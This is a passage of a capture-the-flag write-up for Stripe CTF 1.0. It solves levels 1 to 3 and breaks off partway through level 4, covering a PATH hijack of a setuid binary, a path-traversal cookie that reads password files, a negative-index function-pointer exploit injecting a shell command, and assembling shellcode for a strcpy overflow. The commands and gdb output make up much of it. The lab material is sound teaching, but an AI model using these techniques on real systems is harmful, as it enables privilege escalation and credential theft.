jsanders/stripe-ctf-1.0.md

## stripe-ctf-1.0.md

      
    Raw
  

              stripe-ctf-1.0.md
            
          
    Stripe CTF 1.0

Level 1

Ok, start by ssh-ing to level01@ec2-23-22-123-94.compute-1.amazonaws.com with
password w5kjAsSKEjCT. Our goal is to read the file .password from the level02
user's home directory: /home/level02. Let's look for low-hanging fruit - maybe we
can just read the file directly:
$ ls -l /home/level02/.password
-r-------- 1 level02 root 13 2013-09-06 05:04 /home/level02/.password
$ cat /home/level02/.password
cat: /home/level02/.password: Permission denied
Ok, well it was worth a try. Let's look at our hint: "You may find the binary
/levels/level01 and its source code /levels/level01.c useful." Good, let's
check that stuff out:
$ ls -l /levels/level01 /levels/level01.c
-r-Sr-x--- 1 level02 level01 8617 2012-03-14 09:06 /levels/level01
-r--r----- 1 level01 level01  152 2012-03-14 09:06 /levels/level01.c
Ok cool, so we found out that we have permission to execute the binary and read
the source file. There is also that curious S, which is the setuid bit.
This is our first great clue at how to approach this level - it means the
level01 program will always run with the permissions of the level02 user,
instead of those of the user running it.
Let's start by simply running the binary:
$ /levels/level01
Current time: Fri Sep  6 04:25:06 UTC 2013
Ok, seems pretty innocuous. Let's check out the source:
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  printf("Current time: ");
  fflush(stdout);
  system("date");
  return 0;
}
Bingo - that system("date") call is going to inherit permissions from our
binary, which we already know has access to the level02 user's password.
All we need to do is replace the date program with one of our own:
#!/bin/sh
cat /home/level02/.password
...And make it executable, so that it works with the system call:
$ chmod a+x date
Now, as long as we make sure the level01 binary finds our version of date
instead of the one from the system, we'll get the password:
$ PATH=.:$PATH /levels/level01
Current time: PpIFwe32ODvy
Voila!
Level 2

Alright, now we log in as the level02 user with the password "PpIFwe32ODvy".
Apparently this is a web-based vulnerability, and we're directed to point our
browser at the /level02.php path on the server. I don't have port 80 open to
the server, so we'll just have to use curl locally:
$ curl http://0.0.0.0/level02.php
We get back some very friendly HTML:
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p><p>Looks like a first time user. Hello, there!</p></p>
            <form action="#" method="post">
        Name: <input name="name" type="text" length="40" /><br />
        Age: <input name="age" type="text" length="2" /><br /><br />
        <input type="submit" value="Submit!" />
      </form>
          </div>
  </body>
</html>
Ok, let's try POSTing to the nice form:
$ curl -d "name=James&age=27" http://0.0.0.0/level02.php
Now we don't have the form, and it knows some information about us, but it
still thinks we're a first time user:
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p><p>Looks like a first time user. Hello, there!</p></p>
      You're James, and your age is 27    </div>
  </body>
</html>
Even without looking at the source, we can guess that there is some sort of
statefulness going on in this application, and in HTTP, statefulness means
cookies. Let's see what the headers say:
$ curl -v -d "name=James&age=27" http://0.0.0.0/level02.php
...
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:05:21 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Set-Cookie: user_details=acjpu4h45pxcqoz.txt
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
...

Neat, we have a Set-Cookie in there, let's try just sending that right back:
$ curl -v -d "name=James&age=27" -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
...
> POST /level02.php HTTP/1.1
> User-Agent: curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15
> Host: 0.0.0.0
> Accept: */*
> Cookie: user_details=acjpu4h45pxcqoz.txt
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Fri, 06 Sep 2013 06:09:42 GMT
< Server: Apache/2.2.14 (Ubuntu)
< X-Powered-By: PHP/5.3.2-1ubuntu4.14
< Vary: Accept-Encoding
< Transfer-Encoding: chunked
< Content-Type: text/html
<

<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
      You're James, and your age is 27    </div>
  </body>
</html>
...
Lookie there, it no longer thinks we're a new user! It even knows our IP and
user agent. Sort of spooky. Let's see what happens when we go back to our
original GET, but keep our cookie:
$ curl -v -H "Cookie: user_details=acjpu4h45pxcqoz.txt" http://0.0.0.0/level02.php
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p>127.0.0.1 using curl/7.19.7 (x86_64-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15</p>
            <form action="#" method="post">
        Name: <input name="name" type="text" length="40" /><br />
        Age: <input name="age" type="text" length="2" /><br /><br />
        <input type="submit" value="Submit!" />
      </form>
          </div>
  </body>
</html>
We get the form back, but now it knows our info. Ok, so now we actually have a
clue, before even looking at the source. The cookie has the form user_details=<blah>.txt.
I'm guessing <blah>.txt is a real file being written, and I just bet it's
owned by the level03 user, which means we might be able to use HTTP requests
with crafted cookie headers to read arbitrary files owned by the level03 user.
Ok, let's finally look at the source. It's in /var/www/level02.php. Here are
the interesting parts:
$out = '';
if (!isset($_COOKIE['user_details'])) {
  # Creates a random temp file and sets $out to be a placeholder
}
else {
  $out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);
}

# ...

   <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p><?php echo $out ?></p>

# ...
The else block and the echo $out together allow us to grab arbitrary file
contents through a simple request. We just need to set our user_details cookie
to point to a relative path from /tmp/level02/ to /home/level03/.password:
$ curl -H "Cookie: user_details=../../home/level03/.password" http://0.0.0.0/level02.php
<html>
  <head>
    <title>Level02</title>
  </head>
  <body>
    <h1>Welcome to the challenge!</h1>
    <div class="main">
      <p>RRLQAx7iwvvH
</p>
            <form action="#" method="post">
        Name: <input name="name" type="text" length="40" /><br />
        Age: <input name="age" type="text" length="2" /><br /><br />
        <input type="submit" value="Submit!" />
      </form>
          </div>
  </body>
</html>
BOOM.
Level 3

Woot, let's log in as the level03 user with the password "RRLQAx7iwvvH". Same
drill, but this time with a binary /levels/level03 and matching source file
/levels/level03.c. Let's go straight to running it:
$ /levels/level03
Usage: ./level03 INDEX STRING
Possible indices:
[0] to_upper  [1] to_lower
[2] capitalize	[3] length
$ /levels/level03 0 abcd
Uppercased string: ABCD
$ /levels/level03 1 abcd
Lowercased string: abcd
$ /levels/level03 2 abcd
Capitalized string: Abcd
$ /levels/level03 3 abcd
Length of string 'abcd': 4
$ /levels/level03 4 abcd
Invalid index.
Possible indices:
[0] to_upper	[1] to_lower
[2] capitalize	[3] length
Ok, pretty straightforward - error handling seems reasonably good. Nothing at
all obvious here. Let's hit the code. There are a few interesting sections. First,
it just defines how many functions there are, a function type for them, and the
functions themselves:
#define NUM_FNS 4

typedef int (*fn_ptr)(const char *);

int to_upper(const char *str) { /* ... */ }
int to_lower(const char *str) { /* ... */ }
int capitalize(const char *str) { /* ... */ }
int length(const char *str) { /* ... */ }
Then, there's the curious case of a deprecated function:
int run(const char *str)
{
  // This function is now deprecated.
  return system(str);
}
We'll pretty obviously want to be figuring out how to call that, but it isn't
called directly anywhere in the file. Then, the relatively simple, but juicy,
function that dynamically calls the proper function:
int truncate_and_call(fn_ptr *fns, int index, char *user_string)
{
  char buf[64];
  // Truncate supplied string
  strncpy(buf, user_string, sizeof(buf) - 1);
  buf[sizeof(buf) - 1] = '\0';
  return fns[index](buf);
}
The array of pointers to fn_ptrs is actually passed in from main, and is
defined statically:
fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
Finally, the guard for the index is interesting:
index = atoi(argv[1]);

if (index >= NUM_FNS) { /* ... */ }
Pulling a few strands together, it looks like we need a way to make fns[index]
give us a reference to run, which we can then provide a string to, such as
"cat /home/level04/.password" and have run under the level04 user's permissions.
Let's therfore look very closely at this single line fragment: fns[index](buf).
Of the three parts of that fragment, fns, index, and buf, one is the structure
we'd like to muck with and the other two are user provided. Let's take them case by
case:

buf - Can we overflow our buffer? The use of strncpy seems to make this a
dead end.
fns - Can we inject the address of the run function into this structure
somehow? It seems like no, because it is statically defined to point
to those exact four functions.
index - Can we muck with index in a way that is clearly not intended?
Actually, yes! Note that atoi is signed, but the guard is only
checking for index values greater than 4. We can pass in negative
values!

So now we know our goal - we want to pass a negative value for index that will
cause the run function to be called with a command that prints us the desired
password. What fns[index] really does is *(fns + index) with fns treated
as a 4-byte pointer value. If fns points to 0x10, then fns + 1 points to
0x14 and fns - 1 points to 0x0c. What we need is to find an offset from fns
that is a memory address pointing to a chunk of 4 bytes that represent the memory
location of the run function. The address of the run function is unlikely to
live in memory anywhere, so we'll have to put it there ourselves. Which means
we'll first need to know where it is. There are a few ways (that I know of) to
do this:
With GDB:
$ gdb -d /levels /levels/level03
# ...
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
With objdump:
$ objdump -t /levels/level03 | grep "run$"
0804875b g     F .text	00000013              run
With nm:
$ nm /levels/level03 | grep run$
0804875b T run
I prefer to use gdb, because it's useful for other stuff anyway, as we'll see
in a moment. In any case, that sucker lives at 0x804875b. That's all fine and
good, but how do we get that value into memory somewhere? Well, there's only
one thing that we (almost) fully control, and that is the memory chunk that
ends up in buf. Conveniently, that happens to be sitting on the stack just a
few short bytes up (negative!) from where fns points. Here's where gdb comes
in again, let's figure out exactly how many bytes up:
$ gdb -d /levels /levels/level03
# ...
(gdb) list
59	  // Truncate supplied string
60	  strncpy(buf, user_string, sizeof(buf) - 1);
61	  buf[sizeof(buf) - 1] = '\0';
62	  return fns[index](buf);
63	}
64
65	int main(int argc, char **argv)
66	{
67	  int index;
68	  fn_ptr fns[NUM_FNS] = {&to_upper, &to_lower, &capitalize, &length};
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run 0 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xff96457c, index=0,
    user_string=0xff96492c "abcd") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns
$1 = (fn_ptr *) 0xff96457c
(gdb) print &buf
$3 = (char (*)[64]) 0xff96450c
(gdb) print (0xff96457c - 0xff96450c) / 4
$8 = 28

Nifty! Now we know that if we input -28 for index, the value of fns[index]
will be an address constructed from the first four bytes of the string that we
input! Let's try that:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 abcd
# ...
Breakpoint 1, truncate_and_call (fns=0xffdcc81c, index=-28,
    user_string=0xffdce92c "abcd") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns[index]
$9 = (fn_ptr) 0x64636261

Wow, sure enough, 0x61 is the hex ascii for the 'a' character, 0x62 is 'b',
0x63 is 'c' and 0x64 is 'd'. They're "backwards" because the x86 is a little-
endian architecture, and that's just how chunks of 4 bytes work. If we were on
a big-endian system, the sequence of bytes [ 0x61, 0x62, 0x63, 0x64 ] would
represent the 4-byte word 0x61626364, but on a little-endian system it's the
opposite. This is not a big deal at all, as long as you are aware of it. Ok,
for our next trick, let's get our run address in there instead of 0x64636261:
(gdb) run -28 "`echo -e "\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xfffd9f6c, index=-28,
    user_string=0xfffdb92c "[\207\004\b") at level03.c:62
62	  return fns[index](buf);

Note, I called out to echo with the -e option for interpreting escape sequences,
otherwise we would just end up with literal "", "x", "5", "b", etc. instead of a
single byte representing the value 0x5b, etc. Also note, I listed the bytes in
"backwards" little-endian order. Let's see what this looks like in memory:
(gdb) x/64xb buf
0xfffd9efc:	0x5b	0x87	0x04	0x08	0x00	0x00	0x00	0x00
0xfffd9f04:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f0c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f14:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f1c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f24:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f2c:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xfffd9f34:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

That syntax just means "examine the first 64 hex-formatted bytes of buf". We
can see our values right there where we want them! Let's see if that translates
into getting what we want out of fns:
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>

Bullseye. Let's just let the program run:
(gdb) continue
Continuing.
sh: [: not found

Program exited normally.

Ok, what happened here? Well, all we have in buf is four bytes of gobbledegook.
We called system("\x5b\x87\x04\x08"), which makes no sense. What we need to do
is make the first part of buf do real work, followed by our crafted call to run.
Let's try this: "cat /home/level04/.password;#\x5b\x87\x04\x08". We should be
sending two semi-colon-separated commands to system, the second of which is
just a comment (because of the '#' in front of it) and should have no effect:
(gdb) run -28 "`echo -e "cat /home/level04/.password;#\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffa0fbec, index=-28,
    user_string=0xffa1090f "cat /home/level04/.password;#[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns[index]
$2 = (fn_ptr) 0x20746163

Well duh, that's not right, we added a bunch of stuff at the beginning of buf,
so we need to change our index. Let's figure out what the right value is now:
(gdb) x/64xb buf
0xffa0fb7c:	0x63	0x61	0x74	0x20	0x2f	0x68	0x6f	0x6d
0xffa0fb84:	0x65	0x2f	0x6c	0x65	0x76	0x65	0x6c	0x30
0xffa0fb8c:	0x34	0x2f	0x2e	0x70	0x61	0x73	0x73	0x77
0xffa0fb94:	0x6f	0x72	0x64	0x3b	0x23	0x5b	0x87	0x04
0xffa0fb9c:	0x08	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffa0fba4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffa0fbac:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffa0fbb4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

Hmm, our bytes are there, but they aren't aligned on a word boundary, so we
can't use them yet. We have two options: we could try to remove one character,
or add three. Heck, let's try to remove the '#' - maybe we'll get an error, but
we will have already seen the password and won't care:
(gdb) kill
Kill the program being debugged? (y or n) y
(gdb) run -28 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffacde2c, index=-28,
    user_string=0xfface910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) x/64xb buf
0xffacddbc:	0x63	0x61	0x74	0x20	0x2f	0x68	0x6f	0x6d
0xffacddc4:	0x65	0x2f	0x6c	0x65	0x76	0x65	0x6c	0x30
0xffacddcc:	0x34	0x2f	0x2e	0x70	0x61	0x73	0x73	0x77
0xffacddd4:	0x6f	0x72	0x64	0x3b	0x5b	0x87	0x04	0x08
0xffacdddc:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffacdde4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffacddec:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0xffacddf4:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00

Alright there we are, our bytes are in the second half of the line marked
0xffacddd4, which means they begin at the word boundary 0xffacddd8. Let's figure
out what index we need to get there:
(gdb) print fns
$3 = (fn_ptr *) 0xffacde2c
(gdb) print (0xffacde2c - 0xffacddd8) / 4
$4 = 21
(gdb) print fns[-21]
$5 = (fn_ptr) 0x804875b <run>

Huzzah! Let's put it all together:
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
Breakpoint 1, truncate_and_call (fns=0xffbc988c, index=-21,
    user_string=0xffbca910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) print fns[index]
$6 = (fn_ptr) 0x804875b <run>
(gdb) c
Continuing.
cat: /home/level04/.password: Permission denied
sh: [: not found

Program exited normally.

Ah, yes, we got an error because gdb doesn't allow the normal setuid rules - if
it did, this sort of thing would be way too easy! But it definitely looks like
we ran the command we expected, so let's run it outside gdb!
$ /levels/level03 -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
0lIhigNwu6RT
sh: [: not found
Look! A password! Whew, the game was certainly taken to a new level on this one.
Level 4

Same drill - log in as level04 with password "0lIhigNwu6RT". We're looking
for a password in /home/level05/.password and we have access to the /levels/level04
binary, which is owned by the level05 user and has setuid set, and its source in /levels/level04.c`. There is also a hint: "The vulnerabilities overfloweth!". Oh
boy. As usual, let's start by running the thing:
$ /levels/level04
Usage: ./level04 STRING
Interestingly, there's also not a newline at the end of the output. That seems
suspicious right off the bat. Let's run with some input:
$ /levels/level04 abcd
Oh no! That didn't work!
$ /levels/level04 help
Oh no! That didn't work!
Ok, this is getting us nowhere. To the code! Alright, this one is short, so here's
the whole thing:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fun(char *str)
{
  char buf[1024];
  strcpy(buf, str);
}

int main(int argc, char **argv)
{
  if (argc != 2) {
    printf("Usage: ./level04 STRING");
    exit(-1);
  }
  fun(argv[1]);
  printf("Oh no! That didn't work!\n");
  return 0;
}
Between the hint, and the use of strcpy instead of strncpy for user data, we
can quickly ascertain that we're going for a buffer overflow here. Whatever we
send for the STRING argument to the program past 1024 bytes will begin overwriting
memory that we shouldn't have access to. What to do with that overflow seems to be
the tough part. We don't have any built-in run function as in the last level,
and we need something just like it, which suggests to me that we want to write
our own version in a format that is suitable for injecting through program input.
I think the easiest way to do this is actually to go look at what the compiled
version of the run function from the previous level looks like:
(gdb) print run
$1 = {int (const char *)} 0x804875b <run>
(gdb) set disassembly-flavor intel
(gdb) disassemble run
Dump of assembler code for function run:
   0x0804875b <+0>:	push   ebp
   0x0804875c <+1>:	mov    ebp,esp
   0x0804875e <+3>:	sub    esp,0x18
   0x08048761 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048764 <+9>:	mov    DWORD PTR [esp],eax
   0x08048767 <+12>:	call   0x804847c <system@plt>
   0x0804876c <+17>:	leave
   0x0804876d <+18>:	ret
End of assembler dump.

Alright, so we know it starts at 0x0804875b and does a few things, most notably
the call to 0x0804847c, which appears to be where the system call from the stdlib
lives, and ends at 0x0804876d. The rest of the function is not too clear to me,
but it is probably related to the function calling convention - we know we pass
a const char * to the run function, which at the assembly level is just going
to me we put a single 32-bit value somewhere that the procedure knows to find it.
Let's back log in as the level03 user and step through the actual instructions
that call run to see what's going on:
$ gdb -d /levels /levels/level03
# ...
(gdb) break 62
Breakpoint 1 at 0x80487a9: file level03.c, line 62.
(gdb) run -21 "`echo -e "cat /home/level04/.password;\x5b\x87\x04\x08"`"
# ...
Breakpoint 1, truncate_and_call (fns=0xffc3242c, index=-21,
    user_string=0xffc32910 "cat /home/level04/.password;[\207\004\b") at level03.c:62
62	  return fns[index](buf);
(gdb) set disassembly-flavor intel
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ... Elided beginning of function up to return from strncpy
=> 0x080487a9 <+59>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080487ac <+62>:	shl    eax,0x2
   0x080487af <+65>:	add    eax,DWORD PTR [ebp-0x5c]
   0x080487b2 <+68>:	mov    edx,DWORD PTR [eax]
   0x080487b4 <+70>:	lea    eax,[ebp-0x4c]
   0x080487b7 <+73>:	mov    DWORD PTR [esp],eax
   0x080487ba <+76>:	call   edx
# ... Elided end of function
End of assembler dump.
(gdb) print fns[index]
$1 = (fn_ptr) 0x804875b <run>
(gdb) print &buf
$3 = (char (*)[64]) 0xffc323bc

So we expect to call the function at 0x0804875b with the argument 0xffc323bc.
We eventually call whatever is in edx, so let's see what that is after the first
few instructions of the sequence:
(gdb) stepi
0x080487ac	62	  return fns[index](buf);
(gdb) stepi
0x080487af	62	  return fns[index](buf);
(gdb) stepi
0x080487b2	62	  return fns[index](buf);
(gdb) stepi
0x080487b4	62	  return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
   0x080487a9 <+59>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080487ac <+62>:	shl    eax,0x2
   0x080487af <+65>:	add    eax,DWORD PTR [ebp-0x5c]
   0x080487b2 <+68>:	mov    edx,DWORD PTR [eax]
=> 0x080487b4 <+70>:	lea    eax,[ebp-0x4c]
   0x080487b7 <+73>:	mov    DWORD PTR [esp],eax
   0x080487ba <+76>:	call   edx
# ...
End of assembler dump.
(gdb) print/x $edx
$7 = 0x804875b

Sure enough, there's the address of run, as expected. The more interesting part
is what happens with the address of buf:
(gdb) stepi
0x080487b7	62	  return fns[index](buf);
(gdb) stepi
0x080487ba	62	  return fns[index](buf);
(gdb) disassemble
Dump of assembler code for function truncate_and_call:
# ...
   0x080487a9 <+59>:	mov    eax,DWORD PTR [ebp+0xc]
   0x080487ac <+62>:	shl    eax,0x2
   0x080487af <+65>:	add    eax,DWORD PTR [ebp-0x5c]
   0x080487b2 <+68>:	mov    edx,DWORD PTR [eax]
   0x080487b4 <+70>:	lea    eax,[ebp-0x4c]
   0x080487b7 <+73>:	mov    DWORD PTR [esp],eax
=> 0x080487ba <+76>:	call   edx
# ...
End of assembler dump.
(gdb) x/4xb $esp
0xffc32390:	0xbc	0x23	0xc3	0xff
(gdb) x/1xw $esp
0xffc32390:	0xffc323bc

Oh, hello there &buf - it's simply been put on the top of the stack. The
standard C calling convention just pushes arguments on the stack, in reverse
order, but since we only have one argument, it's right on the top. Let's revisit
the run function with this knowledge:
(gdb) stepi
run (str=0xffc323bc "cat /home/level04/.password;[\207\004\b") at level03.c:51
51	{
(gdb) disassemble
Dump of assembler code for function run:
=> 0x0804875b <+0>:	push   ebp
   0x0804875c <+1>:	mov    ebp,esp
   0x0804875e <+3>:	sub    esp,0x18
   0x08048761 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048764 <+9>:	mov    DWORD PTR [esp],eax
   0x08048767 <+12>:	call   0x804847c <system@plt>
   0x0804876c <+17>:	leave
   0x0804876d <+18>:	ret
End of assembler dump.
(gdb) stepi
0x0804875c	51	{
(gdb) stepi
0x0804875e	51	{
(gdb) stepi
53	  return system(str);
(gdb) stepi
0x08048764	53	  return system(str);
(gdb) stepi
0x08048767	53	  return system(str);
(gdb) disassemble
Dump of assembler code for function run:
   0x0804875b <+0>:	push   ebp
   0x0804875c <+1>:	mov    ebp,esp
   0x0804875e <+3>:	sub    esp,0x18
   0x08048761 <+6>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048764 <+9>:	mov    DWORD PTR [esp],eax
=> 0x08048767 <+12>:	call   0x804847c <system@plt>
   0x0804876c <+17>:	leave
   0x0804876d <+18>:	ret
End of assembler dump.
(gdb) x/1xw $esp
0xffc32370:	0xffc323bc

So all we really did was create ourselves a new 24-word stack frame (I don't
really know why, since we're only using one word of it, but maybe there's a
minimum for some reason), and then push the location of our buffer onto it.
What we've learned from all of this, is that in order to call the system
funtion, all we really need to do is push the location of our buffer onto the
stack and call into the absolute location of system in our object. Of course,
we need actual machine code to do these things. Honestly, I think the easiest way
to do this is to just write what we want locally, run it through an assembler,
and pick out the parts we're interested in. Here's are the instructions we want,
using the values from the level03 example, which we'll have to change later:
push DWORD 0xffc323bc	; Push our buffer address onto the stack
mov eax, 0x0804847c	; Move `system`s address into a register
call eax		; Call `system`
We can't just call 0x0804847c, because immediates are always relative addresses
in the call instruction - it works to write that code, but nasm is cleverly translating
our absolute address into a relative one at assembly time.
One easy way to get the right machine code out of those instructions is to put them
into a program we can run and inspect in gdb. Let's make a file named callsystem.asm:
SECTION .data
SECTION .bss
SECTION .text
global _start
_start:
	push DWORD 0xffc323bc	; Push our buffer address onto the stack
	mov eax, 0x804847c	; Move `system`s address into a register
	call eax		; Call `system`

	mov eax, 1		; `exit` syscall
	mov ebx, 0		; Exit code 0
	int 0x80		; Exit
You'll need the nasm assembler locally to make anything out of that, and we'll
need to know what our target is. We can figure that out by looking at what kinds
of binaries we've been working with thus far:
$ file /levels/level04
/levels/level04: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
We can assemble callsystem.asm into a 32-bit ELF object with debug symbols using
nasm, and link it into an executable with ld:
nasm -g -o callsystem.o callsystem.asm
ld -o callsystem callsystem.o
Now we can attach gdb and look around:
$ gdb ./callsystem
(gdb) break _start
Breakpoint 1 at 0x8048060
(gdb) set disassembly-flavor intel
(gdb) run
Starting program: /vagrant/bin/hello

Breakpoint 1, 0x08048060 in _start ()
(gdb) disassemble
Dump of assembler code for function _start:
=> 0x08048060 <+0>:	push   0xffc323bc
   0x08048065 <+5>:	mov    eax,0x804847c
   0x0804806a <+10>:	call   eax
   0x0804806c <+12>:	mov    eax,0x1
   0x08048071 <+17>:	mov    ebx,0x0
   0x08048076 <+22>:	int    0x80
End of assembler dump.

Ok, so we have a 5-byte push operation, a 5-byte mov and a 2-byte call. Let's
see what they look like:
(gdb) x/5xb 0x08048060
0x8048060 <_start>:	0x68	0xbc	0x23	0xc3	0xff
(gdb) x/5xb 0x08048065
0x8048065 <_start+5>:	0xb8	0x7c	0x84	0x04	0x08
(gdb) x/2xb 0x0804806a
0x804806a <_start+10>:	0xff	0xd0
(gdb) x/12xb 0x08048060
0x8048060 <_start>:	0x68	0xbc	0x23	0xc3	0xff	0xb8	0x7c	0x84
0x8048068 <_start+8>:	0x04	0x08	0xff	0xd0

It's encouraging to see our literal 0xffc323bc and 0x0804847c values peaking
through - we'll be changing those values eventually. Let's get this into a string
using echo -n as before:
$ echo -e "\x68\xbc\x23\xc3\xff\xb8\x7c\x84\x04\x08\xff\xd0"
h�#���|��
Good, it should look like nonsense. There are lots of other ways to get this
information than building a little runnable binary and attaching gdb to it. I'll
describe one easy way. First make a simpler.asm file:
SECTION .text
push DWORD 0xffc323bc	; Push our buffer address onto the stack
mov eax, 0x804847c	; Move `system`s address into a register
call eax		; Call `system`
Assemble it with nasm -f elf32 -o simpler.o simpler.asm and use objdump to see what's
in simpler.o:
$ objdump -s simpler.o

simpler.o:     file format elf32-i386

Contents of section .text:
 0000 68bc23c3 ffb87c84 0408ffd0           h.#...|.....
Since the only thing in our object file is the code for our instructions, the
entirety of the contents of the .text section is what we need. The 0000 at the
beginning is just the address, the rest of the hex are our bytes. Notice that
they're identical to what we found using gdb.
Alright, it's finally time to start mucking around with the level04 program itself.
Let's get in there with gdb and poke around:
$ gdb -d /levels /levels/level04
# ...
Reading symbols from /levels/level04...(no debugging symbols found)...done.
(gdb) list
No symbol table is loaded.  Use the "file" command.

Bummer. Hopefully we can rely purely on the source and disassembly to figure
things out. Let's get in there and see what fun looks like:
(gdb) break fun
Breakpoint 1 at 0x804848d
(gdb) run abcd
Breakpoint 1, 0x0804848d in fun ()
(gdb) disassemble
Dump of assembler code for function fun:
   0x08048484 <+0>:	push   ebp
   0x08048485 <+1>:	mov    ebp,esp
   0x08048487 <+3>:	sub    esp,0x418
=> 0x0804848d <+9>:	mov    eax,DWORD PTR [ebp+0x8]
   0x08048490 <+12>:	mov    DWORD PTR [esp+0x4],eax
   0x08048494 <+16>:	lea    eax,[ebp-0x408]
   0x0804849a <+22>:	mov    DWORD PTR [esp],eax
   0x0804849d <+25>:	call   0x8048388 <strcpy@plt>
   0x080484a2 <+30>:	leave
   0x080484a3 <+31>:	ret
End of assembler dump.

This whole thing is pretty much just interacting with the stack (I'm noticing a
trend...), and it's confusing and important for what we're doing, so I'm going
to draw some pictures of the stack. On entry, it looks like this:
  esp  ebp      Address       Value
   |    |
   |    |
   |    |    +------------+------------+
   |    +--->| 0xffa3f218 | 0xffa3f298 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `main`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   |         | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   +-------->| 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
             +------------+------------+

The first thing that happens is a standard stack-frame creation preamble. First,
the current ebp is saved onto the stack with push ebp. Now it looks like this:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    +--->| 0xffa3f218 | 0xffa3f298 |                         <-+
   |         +------------+------------+                           |
   |                      .                                        | `main`s
   |                      .                                        | stack
   |                      .                                        | frame
   |         +------------+------------+                           |
   |         | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |         +------------+------------+                           |
   |         | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |         +------------+------------+
   +-------->| 0xffa3f200 | 0xffa3f218 |
             +------------+------------+

Then, ebp is moved to the current stack position with mov ebp, esp:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
   |    |                 .                                        | stack
   |    |                 .                                        | frame
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f200 | 0xffa3f92b |----> parameter `*str`     |
   |    |    +------------+------------+                           |
   |    |    | 0xffa3f1fc | 0x080484dc |----> return from `fun`  <-+
   |    |    +------------+------------+
   +----+--->| 0xffa3f1f8 | 0xffa3f218 |
             +------------+------------+

Finally, funs allocates a 1048-byte stack frame with sub esp, 0x418:
  esp  ebp      Address       Value
   |    |    +------------+------------+
   |    |    | 0xffa3f218 | 0xffa3f298 |                         <-+
   |    |    +------------+------------+                           |
   |    |                 .                                        | `main`s
